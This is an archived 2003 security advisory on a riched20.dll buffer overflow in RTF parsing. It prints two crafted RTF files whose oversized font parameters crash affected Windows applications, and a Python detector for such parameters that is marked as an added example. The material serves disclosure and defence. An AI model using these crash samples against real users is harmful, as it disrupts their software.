Riched20.DLL attribute label buffer overflow vulnerability

From: Jie Dong (Thkrdevat_private)
Date: Sun Feb 16 2003 - 05:30:50 PST


    ===========================================================================
    Security Defence Studio vulnerability announcement [001]
    Riched20.DLL attribute label buffer overflow vulnerability
    URL: http://www.yoursft.com
    Author: Thrkdev
    Found: February 1, 2003
    Announced: February 14, 2003
    
    Affected systems: Microsoft Windows 98
                      Microsoft Windows 2000
                      Microsoft Windows XP
                      This vulnerability perhaps also exists on other operating
                      systems, but that is untested.
    EMAIL:  Thkrdevat_private
    ------------------------------------------------------------------------
    Technical description:
      A buffer overflow vulnerability exists in riched20.dll. It can crash any
    application program that uses the affected function of the DLL module, but
    it is very difficult to turn it into allowing an attacker to execute
    commands on a user's system.

      The problem is in the code that parses RTF files: there is an overflow
    when the numeric string of an attribute (such as the size of the characters)
    in the file is processed. This overflow does not seem usable for executing
    commands.
      The following RTF file may result in an illegal operation:
    {\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
    \fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
    {\colortbl ;\red255\green0\blue255;}
    \viewkind4\uc1\pard\cf1\kerning2\f0
    \fs18121111111111111111111111111111111110000 www.yoursft.com\fs20\par
    }
    "\fs" sets the size of the words that follow it ("www.yoursft.com"). When
    the numeric string that sets the font size exceeds 1024 bytes (>1024b), it
    causes the buffer overflow; when it exceeds 65536 bytes (>65536b) it will
    probably crash the application program.
    This problem appears not only in the setting of "\fs": other attributes
    have the same problem in a similar situation. The following RTF file will
    also result in an illegal operation:
    {\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0
    \fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
    {\colortbl ;\red255\green0\blue255;}
    \viewkind4\uc1\pard\cf1\kerning2\f0121111111111111111111111111111111112222
    \fs180 www.yoursft.com\fs20\par
    }
    The terrible thing is that nowadays lots of software is affected by this
    vulnerability. An attacker can send a malicious message that exploits the
    vulnerability, and when you read that message your program will crash.
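
    A way to check incoming RTF for this condition before it reaches an
    application that uses riched20.dll. This is an added example, not code
    from the advisory or from Security Defence Studio: it tokenises RTF control
    words and reports any whose numeric parameter is wider than the RTF
    specification allows, run over the advisory's own two sample documents
    (copied below with the e-mail line wrapping removed). The 11-character
    limit and the function names are assumptions of the example.

```python
import re
from typing import List, Tuple

# Tokenise RTF: a control word (\letters with optional signed numeric parameter)
# or a control symbol (\ plus one non-letter, e.g. \' or \\). Consuming control
# symbols keeps an escaped backslash (\\) from being read as a control word.
RTF_TOKEN = re.compile(rb"\\(?:([A-Za-z]+)(-?[0-9]+)?|(.))", re.DOTALL)

# The RTF specification defines the numeric parameter as a signed integer
# (16-bit originally, 32-bit in later revisions), so a well-formed parameter
# never needs more than 11 characters ("-2147483648"). Assumed limit for this
# example; the advisory reports the riched20.dll overflow only past 1024 bytes.
MAX_PARAM_LEN = 11


def find_oversized_params(rtf: bytes, limit: int = MAX_PARAM_LEN) -> List[Tuple[str, int, int]]:
    """Return (control_word, parameter_length, byte_offset) for every control
    word whose numeric parameter is longer than `limit` characters."""
    hits = []
    for m in RTF_TOKEN.finditer(rtf):
        word, param = m.group(1), m.group(2)
        if word is not None and param is not None and len(param) > limit:
            hits.append((word.decode("ascii"), len(param), m.start()))
    return hits


# Advisory sample 1 (constructed copy): oversized parameter on \fs (font size).
SAMPLE_FS = rb"""{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0\fs18121111111111111111111111111111111110000 www.yoursft.com\fs20\par
}"""

# Advisory sample 2 (constructed copy): the same problem on \f (font number).
SAMPLE_F = rb"""{\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0\fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}}
{\colortbl ;\red255\green0\blue255;}
\viewkind4\uc1\pard\cf1\kerning2\f0121111111111111111111111111111111112222\fs180 www.yoursft.com\fs20\par
}"""

# The same document with a sane font size, for contrast: no findings expected.
SAMPLE_OK = re.sub(rb"\\fs[0-9]+ www", b"\\\\fs18 www", SAMPLE_FS)

if __name__ == "__main__":
    for name, doc in (("fs", SAMPLE_FS), ("f", SAMPLE_F), ("ok", SAMPLE_OK)):
        print(name, find_oversized_params(doc))
```

    Only the parameter width is checked; a document is reported, not modified,
    so it can be quarantined or rejected before an affected viewer renders it.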
      
    ------------------------------------------------------------------------
    Security Defence Studio is a software development / technology website,
    mainly developing network security products. Its software, Trojan Ender,
    has received extensive favourable comment from users.
    



    This archive was generated by hypermail 2b30 : Mon Feb 17 2003 - 07:37:34 PST